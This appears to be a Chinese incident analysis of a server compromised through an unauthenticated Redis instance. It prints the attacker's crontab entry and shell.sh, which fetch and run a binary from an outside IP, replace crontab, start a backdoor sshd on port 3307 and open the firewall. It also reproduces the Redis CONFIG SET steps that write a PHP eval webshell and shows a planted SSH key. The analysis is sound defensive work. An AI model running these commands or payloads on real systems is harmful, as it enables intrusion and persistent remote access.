1、/etc/crontab文件被修改:
REDIS0006þ^@^@^Gcrackit@T
SHELL=/bin/sh
#* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh
ÿÉ6<95>GþÊN<8c>
2、shell.sh文件:
rm -rf shell.sh
wget -P /tmp http://104.223.72.167:8080/rebot
chmod 777 /bin/rebot
nohup bin/rebot > /tmp/bin/rebot.file 2>&1
rm -rf /etc/crontab
wget -P /etc http://104.223.72.167:8080/crontab
ln -sf /usr/stmp/sshd /tmp/su;/tmp/su -oPort=3307
iptables -I INPUT -p tcp --dport 3307 -i ACCEPT
/etc/rc.d/init.d/iptables save
入侵分析:
首先扫描端口,发现redis的默认服务端口6379,由于某些暴露在外面的redis没有设置密码,这样就可以直接登录。
1.修改crontab文档,这里建立一个tmp下的文档,
CONFIG SET dir /tmp/
CONFIG set dbfilename test.php
SET fuck "<?php @eval($_POST[123]);?>"
save
然后,去tmp目录查看,
ls /tmp/
dump.rdb hist hsperfdata_ngx hsperfdata_root log test.php
发现已经生成,打开查看:
REDIS0006þ^@^@^Dfuck^[<?php @eval($_POST[123]);?>ÿ^WÙY©A
p^W
和原来的crontab文档进行对比,发现都有相同的头部:REDIS0006þ^@^@^D
2.crontab定时运行,下载shell文档到tmp下面
还有一个地方需要注意:
root目录下的.ssh/authorized_keys
打开发现:
REDIS0006þ^@^@^Gcrackit^G
^@^CqweA<9f>
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm8glBB05kyIgRXCs8WuRwV5zLVU0LjzL1eFl70hIj0/raIl1RxCMrm6u7+fLjxEgoaCiuoNrL+gb+9Z6uBPhIdF3Q61WLuNB/nQ83S3o3d6gW9urkYU3/jKO1y7RZ+E/3u5GNrFsdMl4xaLatjcj7KSU6WJo4c90OSu0RhzZLS2jWKOLiWF3JSwoKTXouAfcDebhyt97D/HF/mZsIIG9wZVVZVoqFpm/RSZvsYvDdICy8hk3osVXW5rSw0vpB9uWBSQBfiJ5/eKZBeKSkJE8s3T75/NFrrr0n6A3h7fODsjUTIOYjOcFqAyrzdBG59eo441MaqB4nThGk+007IACZw== root@dedi10243.hostsailor.com
ÿÛ6·3ëTDß
又是典型的redis文件的格式!
在ssh的目录下面还发现了其它遗留的文件:
在/etc/ssh下也有相关的文档:
authorized_keys ssh_config ssh_host_dsa_key ssh_host_key ssh_host_rsa_key
moduli sshd_config ssh_host_dsa_key.pub ssh_host_key.pub ssh_host_rsa_key.pub
vi authorized_keys
发现:
REDIS0006þ^@^@^S1601251638050293014